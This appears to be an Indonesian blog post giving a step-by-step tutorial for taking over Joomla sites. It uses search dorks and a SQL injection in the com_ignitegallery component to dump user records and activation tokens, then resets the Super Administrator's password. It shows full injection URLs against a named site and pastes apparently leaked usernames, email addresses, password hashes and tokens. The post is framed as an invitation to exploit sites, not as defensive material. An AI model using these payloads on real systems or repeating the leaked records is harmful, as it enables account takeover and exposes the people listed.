Joomla adalah semacam aplikasi yang di gunakan web untuk menaktifkan fitur - fitur yang di inginkan admin , dengan pembenahan yang slalu di lakukan oleh creator cms jomla semakin kebal terhadap serangan - serangan dari si hacker , tapi namanya dunia , di dunia ini tidak ada yang sempurna jadi walaupun sulit tetap ada celahnya , nah dari sekian ribu exploit yang sudah di tulis oleh sang exploiter sekarang saya akan memperkenalkan satu berikut tutorialnya
dork : inurl:”option com_artforms” atau " inurl:"option=com_ignitegallery"
silahkan pilih dari salah satu dork di atas , kemudian search melalui search engine seperti google dan semacamnya
misalkan kita pakai web http://pnbk-kalsel.site90.net/
index.php?option=com_ignitegallery&task=view&gallery=
-4+union+all+select+1,2,group_concat
(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,
usertype),4,5,6,7,8,9,10+from+jos_users--
jadi akan seperti ini
maka akan keluar data seperti
62:sius:sius:numpang.hack@gmail.com:e92031de42e5df2d6975a9c74630dcf6:L0DTRLYAUQzwJVAIQPvrXgGy895v4Xa9:Super Administrator,63:ewin:ewin:ewin007@yahoo.com:e7af7063ed9ac05f16fd6cf090573174:scfVtU1CpA9Pz02tc2RNE96vlHuIRw6O:,64:wa2n:chalex:wwn_chalex@yahoo.com:ab76e0c586911f94ed2d0599d7be0821:rp76HTMGrzIdpnlCn8EkLAKMoRFNo3yl:,65:wa2n:chalex pnbk:wwn_chalex@yahoo.co.id:1c63849fc1d6b2c277e0723a974b5062:uVgnJSFZdeRy0wvN3YFTmifAVwDdfqAx:,66:wawan:wa2n:wa2n_chalex@yahoo.com:6da7e79d1ffb7b3daffdb6c290699b61:7K4NPwHXduU3HbE2GUhnFnNSAgsgRPPD:,67:erwansyah:wa2n_pnbk:wwn_chalex@pnbk-kalsel.co.id:1f05dfd97e992824ff268ad495e4294c:6gqN4Hrvd7ChFq1BLCY1KgBRvRPIM03M:,68:erwansyah:wa2n_pnbki:wa2n_pnbki@pnbk.kalsel.co.id:60201af5346219f8504a0029a027b813:AY72Rmh7gX3kEQu4dPhJFsHSMSdUP8MZ:,69:Iqbal:Nur:Muhammadnur.iqbal@yahoo.com:2c4846c7763d749481d17a64a9c6b17c:Vy8sIWjhRE8WvTz5Vyi1PjjHy0iIw3Ti:,70:suexAmosseBog:suexAmosseBog:arousiafraurl@gmail.com:704fe5d28b53bcba95096c7dd8d4892d:XPdxRmxoTcJVcJ1wT74IlrOKld46JRA5:,71:dj-rigo:dj-rigo:
kemudian kita meng reset pasword web target tersebut dengan exploit
/index.php?option=com_user&view=reset
jadi alamatnya akan seperti ini
http://pnbk-kalsel.site90.net//index.php?option=com_user&view=reset
pertama masukan salah satu email dari data yang kita dapat tadi
misalkan : numpang.hack@gmail.com
kita masukan alat tersebut lalu submit
langkah selanjutnya si target akan meminta token / ativasi nya
exploitnya adalah
/index.php?option=com_ignitegallery&task=view&gallery=
-4+union+all+select+1,2,group_concat
(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,
0x3a,activation),4,5,6,7,8,9,10+from+jos_users--
maka akan menjadi seperti contoh
http://pnbk-kalsel.site90.net//index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--
maka akan kita dapat data seperti
62:sius:sius:numpang.hack@gmail.com:e92031de42e5df2d6975a9c74630dcf6:L0DTRLYAUQzwJVAIQPvrXgGy895v4Xa9:c18bdb5926cc5b8e939e81c4fd5c2d04,63:ewin:ewin:ewin007@yahoo.com:e7af7063ed9ac05f16fd6cf090573174:scfVtU1CpA9Pz02tc2RNE96vlHuIRw6O:fc3432523740d976fec55c798ff51c9d,64:wa2n:chalex:wwn_chalex@yahoo.com:ab76e0c586911f94ed2d0599d7be0821:rp76HTMGrzIdpnlCn8EkLAKMoRFNo3yl:1207b71f20caab5c02dd16b034d3d594,65:wa2n:chalex pnbk:wwn_chalex@yahoo.co.id:1c63849fc1d6b2c277e0723a974b5062:uVgnJSFZdeRy0wvN3YFTmifAVwDdfqAx:b6369e32a3b976b84cc9d6755db19681,66:wawan:wa2n:wa2n_chalex@yahoo.com:6da7e79d1ffb7b3daffdb6c290699b61:7K4NPwHXduU3HbE2GUhnFnNSAgsgRPPD:2027bb0e95ed74ea0c59f04c2c199fb4,67:erwansyah:wa2n_pnbk:wwn_chalex@pnbk-kalsel.co.id:1f05dfd97e992824ff268ad495e4294c:6gqN4Hrvd7ChFq1BLCY1KgBRvRPIM03M:b0282e09c87efd8403fe3a88f5eb86a6,68:erwansyah:wa2n_pnbki:wa2n_pnbki@pnbk.kalsel.co.id:60201af5346219f8504a0029a027b813:AY72Rmh7gX3kEQu4dPhJFsHSMSdUP8MZ:4458d6ce0a7c2550388eef14a46709ea,69:Iqbal:Nur:Muhammadnur.iqbal@yahoo.com:2c4
atau contoh sperti ini biar lebi sepesifik
http://pnbk-kalsel.site90.net//index.php?option=com_ignitegallery&task=view&gallery=-2+union+all+select+1,2,group_concat(activation),4,5,6,7,8,9,10+from+jos_users--
maka akan keluar contoh data
60d9bf1756ed9d7c1b1cc6241a637814,fc3432523740d976fec55c798ff51c9d,1207b71f20caab5c02dd16b034d3d594,b6369e32a3b976b84cc9d6755db19681,2027bb0e95ed74ea0c59f04c2c199fb4,b0282e09c87efd8403fe3a88f5eb86a6,4458d6ce0a7c2550388eef14a46709ea,86bcab19eb205c980ba28e1b10cb0302,8e7b63bd9b50e83d0385cd3b2248c3b1,,,ea27769ac4d72465e00f32c5e4b2ecb7,,,70560ce8a657c4f4dada87d1e2451524,92112c54e9d6859f8c8d28dd0deb3730,,,,,,,a96fa6eb6a3794d51ddf24743c63f885,6924b0c5013533209bdcb210a4cfbc06,,,,,,,,2d6504d134c3fe3fd83c74aff1588ea6,108d6b4582316c242606c390f0495faa,19ca62e03b8859a574e4e4ed56a1ef18,,,,,8c7cc4ce99e00b37d195a09ecd7bc8b4,7a82ca5fa644f778833cab2f010e4abc,,50e18fe95fb6636f2f6d6946ff677310,013a0bf1543774fdecac09f5b1aac844,,763700924d126afcf631fb362fd59756,,,,4d09f32b81bbdf85ff6a4dea7b0893c4,,,,02c0c27fc820f2805728e11b7344d5ef,,,5ab92eccb558449cd9e29adc9df1e19b,,,,,,,,,,,,,,7eaa8620fe2bea5da44cc83dda6266a6,,,,,,,8f931020e4b8636a700fdd36cd70d752,d8da6b920a709cc9b9c65e39d2580e2e,,,,a9845dcb48962123687a30106b540afa,3a7a0c5961b50e
nb : atara 1 aktivasi dengan aktivasi yang lain di pisahkan dengan tanda koma (,)
sekarang kita sudah dapat aktifasinya kan , masukan kode aktivasi / tokenya lalu klik sibmit
dan sekarang kita bisa edit passwordnya
masukan passowrd baru misalkan "hacked" tanpa tanda petik
maka akan keluar halaman login , login dengan user
user : sius
pass : hacked
nb : sius adalah data yang kita dapat dri data yang paling atas
sekian tutorial dari saya selamat ber exploit ria dan salam olahraga :)
![IGOS [Indonesia Go Open Source]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQlyhFx739c2DVD43ItXscyBO_ouCu0IBEczNn3D8uFll_G7KJY41aJyDSv2Y_3jO5qAoUB0ydg26H5M8TPHpx0013BWq2PPWy4FYNJl7Yh1EwWZHf6Y2ywZ4Kw-dZGSMZJt9tG14W=s0-d)
Posting Komentar